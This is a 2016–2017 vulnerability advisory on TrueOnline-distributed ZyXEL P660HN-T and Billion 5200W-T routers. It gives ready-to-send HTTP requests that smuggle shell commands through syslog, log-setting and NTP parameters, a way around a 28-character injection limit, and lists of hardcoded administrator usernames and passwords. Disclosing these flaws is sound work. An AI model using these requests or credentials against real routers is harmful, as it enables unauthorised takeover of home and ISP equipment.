TrueOnline ZyXEL / Billion Command Injection / Default Credentials

`===============  
>> Multiple vulnerabilities in TrueOnline / ZyXEL / Billion routers  
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information  
Security  
==========================================================================  
Disclosure: 26/12/2016 / Last updated: 12/01/2017  
  
  
>> Summary:  
TrueOnline is a major Internet Service Provider in Thailand which  
distributes various rebranded ZyXEL and Billion routers to its customers.  
Three router models - ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion  
5200W-T - contain a number of default administrative accounts, as well  
as authenticated and unauthenticated command injection vulnerabilities  
in their web interfaces, mostly in the syslog remote forwarding  
function. All the routers are still in widespread use in Thailand, with  
the Billion 5200W-T router currently being distributed to new customers.  
  
These routers are based on the TC3162U SoC (or variants of it), a  
system-on-a-chip made by TrendChip, which was a manufacturer of SoC that  
was acquired by Ralink / MediaTek in 2011.  
TC3162U based routers have two firmware variants.  
  
The first variant is "ras", used on hardware versions that have 4mb or  
less of flash storage, which is based on the real time operating system  
ZynOS. It is infamous as the includes Allegro RomPager v4.07, which is  
vulnerable to the "misfortune cookie" attack (see [1]), and its web  
server is vulnerable to the "rom-0" attack (see [2]).  
The other variant is "tclinux", which is a full fledged Linux used in  
hardware versions that have more than 4 MB of flash storage. This  
advisory refers to this variant, which includes the Goahead web server  
and several ASP files with the command injection vulnerabilities. Note  
that tclinux might also be vulnerable to the misfortune cookie and rom-0  
attacks - this was not investigated in detail by the author. For more  
information on tclinux see [3].  
  
It should be noted that tclinux contains files and configuration  
settings in other languages (for example in Turkish). Therefore it is  
likely that these firmware versions are not specific to TrueOnline, and  
other ISP customised routers in other countries might also be  
vulnerable. It is also possible that other brands and router models that  
use the tclinux variant are also affected by the command injection  
vulnerabilities (the default accounts are likely to be TrueOnline  
specific). Please contact [email protected] if you find any other routers  
or firmware versions that have the same vulnerabilities.  
  
These vulnerabilities were discovered in July 2016 and reported through  
Securiteam's Secure Disclosure program (see  
https://blogs.securiteam.com/index.php/archives/2910 for their  
advisory). SSD contacted the vendors involved, but received no reply and  
posted their advisory on December 26th 2016. There is currently no fix  
for these issues. It is unknown whether these issues are exploitable  
over the WAN, although this is a possibility since some of the default  
accounts appear to have been deployed for ISP use.  
  
Three Metasploit modules that abuse these vulnerabilities have been  
released (see [4], [5] and [6]).  
  
  
>> Technical details:  
#1  
Vulnerability: Unauthenticated command injection (ZyXEL P660HN-T v1)  
NO-CVE  
Attack Vector: Remote  
Constraints: Can be exploited by an unauthenticated attacker in the LAN.  
See below for other constraints.  
Affected versions:  
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version  
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions  
might be affected  
  
This router has a command injection vulnerability in the Maintenance >  
Logs > System Log > Remote System Log forwarding function.  
The vulnerability is in the ViewLog.asp page, which is accessible  
unauthenticated. The following request will cause the router to issue 3  
ping requests to 10.0.99.102:  
  
POST /cgi-bin/ViewLog.asp HTTP/1.1  
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save  
  
The command in injection is in the remote_host parameter.  
This vulnerability was found during a black box assessment of the web  
interface, so a root cause was not determined.  
  
  
#2  
Vulnerability: Authenticated command injection (ZyXEL P660HN-T v2)  
NO-CVE  
Attack Vector: Remote  
Constraints: Can be exploited by an authenticated attacker in the LAN.  
See below for other constraints.  
Affected versions:  
- ZyXEL P660HN-T, hardware revision v2, TrueOnline firmware version  
TCLinux Fw #7.3.37.6, other firmware versions might be affected  
  
Unlike in the P660HN-Tv1, the injection is authenticated and in the  
logSet.asp page. However, this router contains a hardcoded supervisor  
password (see below) that can be used to exploit this vulnerability.  
The injection is in the logSet.asp page that sets up remote forwarding  
of syslog logs, and the parameter vulnerable to injection is the  
serverIP parameter, which can be abused in the following way:  
  
ServerIP=1.1.1.1`<COMMAND>`&#  
  
The following request will cause the router to issue 3 ping requests to  
1.1.1.1:  
  
POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1  
logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping  
-c 3 1.1.1.1`%26%23&serverPort=514  
  
This vulnerability was found during a black box assessment of the web  
interface, so a root cause was not determined. It is known that this  
injection ends up in /etc/syslog.conf as  
  
The actual injection is limited to 28 characters. This can circunvented  
by writing a shell script file in the /tmp directory 28 characters at a  
time, and the executing that file.  
  
  
#3  
Vulnerability: Unauthenticated command injection (Billion 5200W-T)  
NO-CVE  
Attack Vector: Remote  
Constraints: Can be exploited by an unauthenticated attacker in the LAN.  
See below for other constraints.  
Affected versions:  
- Billion 5200W-T, TrueOnline firmware version 1.02b.rc5.dt49, other  
firmware versions might be affected  
  
The Billion 5200W-T router contains an unauthenticated command injection  
in adv_remotelog.asp page, which is used to set up remote syslog forwarding.  
The following request will cause the router to issue 3 ping requests to  
192.168.1.35:  
  
POST /cgi-bin/adv_remotelog.asp HTTP/1.1  
Host: 192.168.1.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 85  
  
RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514  
  
The injection is on the syslogServerAddr parameter and can be exploited  
by entering a valid IP address, followed by ";<COMMAND>;"  
This vulnerability was found during a black box assessment of the web  
interface, so a root cause was not determined.  
  
  
#4  
Vulnerability: Authenticated command injection (Billion 5200W-T)  
NO-CVE  
Attack Vector: Remote  
Constraints: Can be exploited by an authenticated attacker in the LAN.  
See below for other constraints.  
Affected versions:  
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008  
130603, other firmware versions might be affected  
  
The Billion 5200W-T router also has several other command injections in  
its interface, depending on the firmware version, such as an  
authenticated command injection in tools_time.asp (uiViewSNTPServer  
parameter).  
It should be noted that this router contains several hardcoded  
administrative accounts that can be used to exploit this vulnerability.  
This injection can be exploited with the following request:  
  
POST /cgi-bin/tools_time.asp HTTP/1.1  
Host: 192.168.1.1  
Authorization: Basic YWRtaW46cGFzc3dvcmQ=  
Cookie: SESSIONID=7c082c75  
  
SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+192.168.0.1+%26%23&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA  
  
This writes the command to a file /etc/ntp.sh:  
/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 192.168.0.1 &#" &  
which is then executed almost immediately.  
  
This vulnerability was found during a black box assessment of the web  
interface, so a root cause was not determined.  
  
  
#5  
Vulnerability: Default administrative credentials (ZyXEL P660HN-T v1)  
NO-CVE  
Attack Vector: Remote  
Constraints: N/A  
Affected versions:  
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version  
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions  
might be affected  
  
This router contains the following default administrative accounts:  
username: admin; password: password  
username: true; password: true  
  
  
#6  
Vulnerability: Authenticated command injection (ZyXEL P660HN-T v2)  
NO-CVE  
Attack Vector: Remote  
Constraints: N/A  
Affected versions:  
- ZyXEL P660HN-T, hardware revision v2, TrueOnline firmware version  
TCLinux Fw #7.3.37.6, other firmware versions might be affected  
  
This router contains the following default administrative accounts:  
username: admin; password: password  
username: true; password: true  
username: supervisor; password: zyad1234  
  
  
#7  
Vulnerability: Authenticated command injection (Billion 5200W-T)  
NO-CVE  
Attack Vector: Remote  
Constraints: N/A  
Affected versions:  
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008  
130603, other firmware versions might be affected  
  
This router contains the following default administrative accounts:  
username: admin; password: password  
username: true; password: true  
username: user3; password:  
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678  
  
  
>> Fix:  
There is NO FIX for this vulnerability. Do not allow untrusted clients  
to connect to these routers. Timeline of disclosure:  
July 2016: Vulnerability reported to Securiteam Secure Disclosure  
Securiteam contacted the affected versions. No response.  
  
26.12.2016: Vulnerability information published in the SSD blog.  
12.01.2017: Vulnerability information published in  
https://github.com/pedrib/PoC  
  
  
>> References:  
[1] http://www.kb.cert.org/vuls/id/561444  
[2]  
https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/  
[3] https://vasvir.wordpress.com/tag/trendchip-firmware/  
[4] https://github.com/rapid7/metasploit-framework/pull/7820  
[5] https://github.com/rapid7/metasploit-framework/pull/7821  
[6] https://github.com/rapid7/metasploit-framework/pull/7822  
  
  
================  
Agile Information Security Limited  
http://www.agileinfosec.co.uk/  
>> Enabling secure digital business >>  
`